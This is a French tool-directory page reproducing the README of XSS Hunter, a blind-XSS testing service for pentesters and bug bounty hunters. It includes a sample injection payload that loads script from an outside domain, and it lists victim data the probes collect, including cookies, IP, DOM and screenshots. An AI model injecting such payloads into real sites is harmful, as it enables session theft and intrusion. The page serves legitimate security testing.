Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
xsshunter — Le service XSS Hunter - une version portable de XSSHunter.com | Kitploit
Outils/GitHubGitHub/mandatoryprogrammer/xsshunter
Analyse des VulnérabilitésExploitationCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubmandatoryprogrammer/xsshunter

xsshunter

Le service XSS Hunter - une version portable de XSSHunter.com

Voir le dépôt
1.6k303il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

DÉPRÉCIÉ - ESSAYEZ LA NOUVELLE VERSION EXPRESS

Voir ici pour plus d'infos : https://github.com/mandatoryprogrammer/xsshunter-express

Code source de XSS Hunter

Ceci est une version portable du code source qui fonctionne sur https://xsshunter.com. Il est conçu pour être facilement installable sur n'importe quel serveur pour les professionnels de la sécurité et les chasseurs de primes de bogues qui souhaitent tester les XSS de manière beaucoup plus puissante.

Si vous ne voulez pas configurer ce logiciel et préférez simplement commencer à tester, consultez https://xsshunter.com .

Prérequis

  • Un serveur exécutant (de préférence) Ubuntu.
  • Un compte Mailgun, pour envoyer des e-mails de déclenchement de payload XSS.
  • Un nom de domaine, de préférence court pour réduire la taille des payloads. Voici un bon site pour trouver des noms de domaine à deux lettres : https://catechgory.com/. Mon domaine est xss.ht par exemple.
  • Un certificat SSL wildcard, en voici un bon marché. Ceci est nécessaire car XSS Hunter identifie les utilisateurs en fonction de leurs sous-domaines et ils doivent tous être activés en SSL. Nous ne pouvons pas utiliser Let's Encrypt car . Je vais m'abstenir d'insulter le modèle économique des autorités de certification, mais soyez assuré que c'est très ridicule et qu'il leur en coûte très peu de vous délivrer un certificat wildcard, alors allez avec le fournisseur le moins cher que vous trouvez (tant qu'il est pris en charge par tous les navigateurs).
ils ne prennent pas en charge les certificats wildcard

Configuration

Veuillez consulter https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ pour des informations sur la configuration de XSS Hunter sur votre propre serveur.

Résumé des fonctionnalités

Lors de votre inscription, vous créerez un domaine court spécial comme yoursubdomain.xss.ht qui identifie vos vulnérabilités XSS et héberge votre payload. Vous utilisez ensuite ce sous-domaine dans vos tests XSS, avec des tentatives d'injection comme "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter servira automatiquement des sondes XSS et collectera les informations résultantes lorsqu'elles se déclenchent.

Fonctionnalités

  • Gestion des déclenchements de payload XSS : Gérez tous vos payloads XSS dans le panneau de contrôle de votre compte XSS Hunter.
  • Sondes XSS puissantes : Les informations suivantes sont collectées à chaque fois qu'une sonde se déclenche sur une page vulnérable :
    • L'URI de la page vulnérable
    • L'origine de l'exécution
    • L'adresse IP de la victime
    • Le référent de la page
    • Le User Agent de la victime
    • Tous les cookies non HTTP-Only
    • Le DOM HTML complet de la page
    • Capture d'écran complète de la page affectée
    • Requête HTTP responsable (si un outil compatible XSS Hunter est utilisé)
  • Captures d'écran pleine page : Les sondes XSS Hunter utilisent l'API canvas HTML5 pour générer une capture d'écran complète de la page vulnérable sur laquelle un payload XSS s'est déclenché. Avec cette fonctionnalité, vous pouvez jeter un coup d'œil dans les panneaux d'administration internes, les bureaux d'assistance, les systèmes de journalisation et autres applications web internes. Cela permet des rapports plus puissants montrant l'impact complet de la vulnérabilité à votre client ou programme de bug bounty.
  • Génération de rapports Markdown : Chaque rapport de payload XSS est accompagné d'un rapport Markdown pré-généré. Ces rapports générés sont également compatibles avec d'autres plateformes supportant le Markdown, comme Phabricator, pour un signalement facile des bogues dans les systèmes de tickets de l'entreprise.
  • Rapports par e-mail de déclenchement de payload XSS : Les déclenchements de payload XSS envoient également des rapports détaillés par e-mail qui peuvent être facilement transférés aux contacts de sécurité appropriés pour un signalement rapide des bogues critiques.
  • Génération automatique de payload : XSS Hunter génère automatiquement des payloads XSS à utiliser dans vos tests de sécurité d'applications web.
  • Injections corrélées : Peut-être la fonctionnalité la plus puissante de XSS Hunter est la capacité de corréler les tentatives d'injection avec les déclenchements de payload XSS. En utilisant un outil de test compatible XSS Hunter, vous pouvez savoir immédiatement ce qui a provoqué le déclenchement d'un payload spécifique (même des semaines après la tentative d'injection !).
  • Option de chiffrement PGP pour les e-mails de payload : Paranoïaque supplémentaire ? Le chiffrement PGP côté client est disponible, chiffrant toutes les données d'injection dans le navigateur de la victime avant de les envoyer au service XSS Hunter.
  • Récupération de pages : Lors du déclenchement de votre payload XSS, vous pouvez spécifier une liste de chemins relatifs que le payload doit récupérer et stocker automatiquement. Cela est utile pour trouver d'autres vulnérabilités comme de mauvaises politiques crossdomain.xml sur des systèmes internes qui ne seraient normalement pas accessibles.
  • Chargement de payload secondaire : Vous avez un payload secondaire à charger après que XSS Hunter a fait son travail ? XSS Hunter vous offre la possibilité de spécifier un payload JavaScript secondaire à exécuter une fois sa collecte terminée.
  • Application web iOS : Il est également possible de visualiser vos déclenchements de payload XSS via une application web iOS. Il suffit de naviguer vers le chemin /app et d'enregistrer la page en tant qu'application web sur l'écran d'accueil de votre iPhone.

Exploits notables

  • XSS aveugle dans l'outil de service interne de Tesla : https://samcurry.net/cracking-my-windshield-and-earning-10000-on-the-tesla-bug-bounty-program/
  • XSS aveugle dans l'intégration Salesforce de Spotify : https://mhmdiaa.github.io/blind-xss-in-spotify/
  • XSS aveugle dans le panneau d'assistance de GoDaddy : https://thehackerblog.com/poisoning-the-well-compromising-godaddy-customer-support-with-blind-xss/

Envie de contribuer ?

Tout le code a été créé par moi et (pour cette raison) n'est probablement pas une bonne pratique et a absolument besoin d'optimisation/nettoyage. Toute pull request est appréciée !

Télécharger l’outil